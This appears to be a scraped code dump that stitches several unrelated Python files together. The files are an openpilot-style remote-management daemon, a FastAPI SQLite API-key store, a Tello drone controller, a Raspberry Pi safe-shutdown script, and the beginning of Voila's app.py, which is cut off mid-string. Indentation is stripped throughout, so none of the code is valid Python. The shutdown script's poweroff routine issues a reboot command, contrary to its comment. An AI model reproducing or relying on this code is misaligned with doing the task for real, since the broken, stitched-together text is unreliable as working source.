#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import version, get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://api.retropilot.org:4040')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if i is not None]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
dongle_id = Params().get("DongleId", encoding='utf-8')
api = Api(dongle_id)
manage_tokens(api)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
# params.delete("PrimeRedirected")
manage_tokens(api)
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
except socket.timeout:
# try:
# r = requests.get("http://api.retropilot.org/v1/me", allow_redirects=False,
# headers={"User-Agent": f"openpilot-{version}"}, timeout=15.0)
# if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
# params.put_bool("PrimeRedirected", True)
# except Exception:
# cloudlog.exception("athenad.socket_timeout.exception")
# params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
_sqlite_access.py
|
import sqlite3
import os
import uuid
import threading
from datetime import datetime, timedelta
from typing import List, Tuple, Optional
from settings import settings
class SQLiteAccess:
def __init__(self):
self.db_location = settings.FASTAPI_SIMPLE_SECURITY_DB_LOCATION
# try:
# self.db_location = os.environ["FASTAPI_SIMPLE_SECURITY_DB_LOCATION"]
# except KeyError:
# self.db_location = "apikeys.sqlite"
self.expiration_limit = settings.FAST_API_SIMPLE_SECURITY_AUTOMATIC_EXPIRATION
# try:
# self.expiration_limit = int(os.environ["FAST_API_SIMPLE_SECURITY_AUTOMATIC_EXPIRATION"])
# except KeyError:
# self.expiration_limit = 15
self.init_db()
def init_db(self):
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
CREATE TABLE IF NOT EXISTS fastapi_simple_security (
api_key TEXT PRIMARY KEY,
is_active INTEGER,
never_expire INTEGER,
expiration_date TEXT,
latest_query_date TEXT,
total_queries INTEGER)
"""
)
connection.commit()
def create_key(self, never_expire: bool) -> str:
api_key = str(uuid.uuid4())
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
INSERT INTO fastapi_simple_security
(api_key, is_active, never_expire, expiration_date, latest_query_date, total_queries)
VALUES(?, ?, ?, ?, ?, ?)
""",
(
api_key,
1,
1 if never_expire else 0,
(datetime.utcnow() + timedelta(days=self.expiration_limit)).isoformat(timespec="seconds"),
None,
0,
),
)
connection.commit()
return api_key
def renew_key(self, api_key: str, new_expiration_date: str) -> Optional[str]:
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
# We run the query like check_key but will use the response differently
c.execute(
"""
SELECT is_active, total_queries, expiration_date, never_expire
FROM fastapi_simple_security
WHERE api_key = ?""",
(api_key,),
)
response = c.fetchone()
# API key not found
if not response:
return "API key not found"
response_lines = []
# Previously revoked key. Issue a text warning and reactivate it.
if response[0] == 0:
response_lines.append("This API key was revoked and has been reactivated.")
# Expired key. Issue a text warning and reactivate it.
if (not response[3]) and (datetime.fromisoformat(response[2]) < datetime.utcnow()):
response_lines.append("This API key was expired and is now renewed.")
if not new_expiration_date:
parsed_expiration_date = (datetime.utcnow() + timedelta(days=self.expiration_limit)).isoformat(
timespec="seconds"
)
else:
try:
# We parse and re-write to the right timespec
parsed_expiration_date = datetime.fromisoformat(new_expiration_date).isoformat(timespec="seconds")
except ValueError:
return "The expiration date could not be parsed. Please use ISO 8601."
c.execute(
"""
UPDATE fastapi_simple_security
SET expiration_date = ?, is_active = 1
WHERE api_key = ?
""",
(parsed_expiration_date, api_key,),
)
connection.commit()
response_lines.append(f"The new expiration date for the API key is {parsed_expiration_date}")
return " ".join(response_lines)
def revoke_key(self, api_key: str):
"""
Revokes an API key
Args:
api_key: the API key to revoke
"""
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
UPDATE fastapi_simple_security
SET is_active = 0
WHERE api_key = ?
""",
(api_key,),
)
connection.commit()
def check_key(self, api_key: str) -> bool:
"""
Checks if an API key is valid
Args:
api_key: the API key to validate
"""
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
SELECT is_active, total_queries, expiration_date, never_expire
FROM fastapi_simple_security
WHERE api_key = ?""",
(api_key,),
)
response = c.fetchone()
if (
# Cannot fetch a row
not response
# Inactive
or response[0] != 1
# Expired key
or ((not response[3]) and (datetime.fromisoformat(response[2]) < datetime.utcnow()))
):
# The key is not valid
return False
else:
# The key is valid
# We run the logging in a separate thread as writing takes some time
threading.Thread(target=self._update_usage, args=(api_key, response[1],)).start()
# We return directly
return True
def _update_usage(self, api_key: str, usage_count: int):
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
# If we get there, this means it’s an active API key that’s in the database. We update the table.
c.execute(
"""
UPDATE fastapi_simple_security
SET total_queries = ?, latest_query_date = ?
WHERE api_key = ?
""",
(usage_count + 1, datetime.utcnow().isoformat(timespec="seconds"), api_key),
)
connection.commit()
def get_usage_stats(self) -> List[Tuple[str, int, str, str, int]]:
"""
Returns usage stats for all API keys
Returns:
a list of tuples with values being api_key, is_active, expiration_date, latest_query_date, and total_queries
"""
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
# TODO Add filtering somehow
c.execute(
"""
SELECT api_key, is_active, never_expire, expiration_date, latest_query_date, total_queries
FROM fastapi_simple_security
ORDER BY latest_query_date DESC
""",
)
response = c.fetchall()
return response
sqlite_access = SQLiteAccess()
|
tello.py
|
import socket
import threading
import time
import cv2
from easytello.stats import Stats
from easytello.tello_control import TelloControl
class Tello:
def __init__(self, tello_ip: str='192.168.10.1', debug: bool=True):
# 追加
self.lastframe = None
self.controller: TelloControl = None
# Opening local UDP port on 8889 for Tello communication
self.local_ip = ''
self.local_port = 8889
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.local_ip, self.local_port))
# Setting Tello ip and port info
self.tello_ip = tello_ip
self.tello_port = 8889
self.tello_address = (self.tello_ip, self.tello_port)
self.log = []
# Intializing response thread
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# easyTello runtime options
self.stream_state = False
self.MAX_TIME_OUT = 15.0
self.debug = debug
# Setting Tello to command mode
self.command()
def set_controller(self, controller: TelloControl):
self.controller = controller
def send_command(self, command: str, query: bool =False):
# New log entry created for the outbound command
self.log.append(Stats(command, len(self.log)))
# Sending command to Tello
self.socket.sendto(command.encode('utf-8'), self.tello_address)
# Displaying conformation message (if 'debug' os True)
if self.debug is True:
print('Sending command: {}'.format(command))
# Checking whether the command has timed out or not (based on value in 'MAX_TIME_OUT')
start = time.time()
while not self.log[-1].got_response(): # Runs while no repsonse has been received in log
now = time.time()
difference = now - start
if difference > self.MAX_TIME_OUT:
print('Connection timed out!')
break
# Prints out Tello response (if 'debug' is True)
if self.debug is True and query is False:
print('Response: {}'.format(self.log[-1].get_response()))
def _receive_thread(self):
while True:
# Checking for Tello response, throws socket error
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
if self.controller is not None:
self.controller.on_success()
except socket.error as exc:
print('Socket error: {}'.format(exc))
if self.controller is not None:
self.controller.on_missing()
def get_position(self):
return self.controller.get_position()
def _video_thread(self):
# Creating stream capture object
cap = cv2.VideoCapture('udp://'+self.tello_ip+':11111')
# Runs while 'stream_state' is True
while self.stream_state:
ret, frame = cap.read()
self.lastframe = frame
#cv2.imshow('DJI Tello', frame) #window消す
# Video Stream is closed if escape key is pressed
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
cap.release()
#cv2.destroyAllWindows()
def read(self):
return self.lastframe
def wait(self, delay: float):
# Displaying wait message (if 'debug' is True)
if self.debug is True:
print('Waiting {} seconds...'.format(delay))
# Log entry for delay added
self.log.append(Stats('wait', len(self.log)))
# Delay is activated
time.sleep(delay)
def get_log(self):
return self.log
# Controll Commands
def command(self):
self.send_command('command')
def takeoff(self):
self.send_command('takeoff')
def land(self):
self.send_command('land')
def streamon(self):
self.send_command('streamon')
self.stream_state = True
self.video_thread = threading.Thread(target=self._video_thread)
self.video_thread.daemon = True
self.video_thread.start()
def streamoff(self):
self.stream_state = False
self.send_command('streamoff')
def emergency(self):
self.send_command('emergency')
# Movement Commands
def up(self, dist: int):
self.send_command('up {}'.format(dist))
def down(self, dist: int):
self.send_command('down {}'.format(dist))
def left(self, dist: int):
self.send_command('left {}'.format(dist))
def right(self, dist: int):
self.send_command('right {}'.format(dist))
def forward(self, dist: int):
self.send_command('forward {}'.format(dist))
def back(self, dist: int):
self.send_command('back {}'.format(dist))
def cw(self, degr: int):
self.send_command('cw {}'.format(degr))
def ccw(self, degr: int):
self.send_command('ccw {}'.format(degr))
def flip(self, direc: str):
self.send_command('flip {}'.format(direc))
def go(self, x: int, y: int, z: int, speed: int):
self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
# Set Commands
def set_speed(self, speed: int):
self.send_command('speed {}'.format(speed))
def rc_control(self, a: int, b: int, c: int, d: int):
self.send_command('rc {} {} {} {}'.format(a, b, c, d))
def set_wifi(self, ssid: str, passwrd: str):
self.send_command('wifi {} {}'.format(ssid, passwrd))
# Read Commands
def get_speed(self):
self.send_command('speed?', True)
return self.log[-1].get_response()
def get_battery(self):
self.send_command('battery?', True)
return self.log[-1].get_response()
def get_time(self):
self.send_command('time?', True)
return self.log[-1].get_response()
def get_height(self):
self.send_command('height?', True)
return self.log[-1].get_response()
def get_temp(self):
self.send_command('temp?', True)
return self.log[-1].get_response()
def get_attitude(self):
self.send_command('attitude?', True)
return self.log[-1].get_response()
def get_baro(self):
self.send_command('baro?', True)
return self.log[-1].get_response()
def get_acceleration(self):
self.send_command('acceleration?', True)
return self.log[-1].get_response()
def get_tof(self):
self.send_command('tof?', True)
return self.log[-1].get_response()
def get_wifi(self):
self.send_command('wifi?', True)
return self.log[-1].get_response()
|
recalbox_SafeShutdown.py
|
import RPi.GPIO as GPIO
import os
import time
from multiprocessing import Process
#initialize pins
powerPin = 3 #pin 5
ledPin = 14 #TXD
resetPin = 2 #pin 13
powerenPin = 4 #pin 5
#initialize GPIO settings
def init():
GPIO.setmode(GPIO.BCM)
GPIO.setup(powerPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(resetPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(ledPin, GPIO.OUT)
GPIO.setup(powerenPin, GPIO.OUT)
GPIO.output(powerenPin, GPIO.HIGH)
GPIO.setwarnings(False)
#waits for user to hold button up to 1 second before issuing poweroff command
def poweroff():
while True:
GPIO.wait_for_edge(powerPin, GPIO.FALLING)
os.system("shutdown -r now")
#blinks the LED to signal button being pushed
def ledBlink():
while True:
GPIO.output(ledPin, GPIO.HIGH)
GPIO.wait_for_edge(powerPin, GPIO.FALLING)
start = time.time()
while GPIO.input(powerPin) == GPIO.LOW:
GPIO.output(ledPin, GPIO.LOW)
time.sleep(0.2)
GPIO.output(ledPin, GPIO.HIGH)
time.sleep(0.2)
#resets the pi
def reset():
while True:
GPIO.wait_for_edge(resetPin, GPIO.FALLING)
os.system("shutdown -r now")
if __name__ == "__main__":
#initialize GPIO settings
init()
#create a multiprocessing.Process instance for each function to enable parallelism
powerProcess = Process(target = poweroff)
powerProcess.start()
ledProcess = Process(target = ledBlink)
ledProcess.start()
resetProcess = Process(target = reset)
resetProcess.start()
powerProcess.join()
ledProcess.join()
resetProcess.join()
GPIO.cleanup()
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import AsyncMappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{'Voila': {'log_level': logging.DEBUG, 'show_tracebacks': True}},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporry connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
show_tracebacks = Bool(False, config=True, help=_(
'Whether to send tracebacks to clients on exceptions.'
))
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
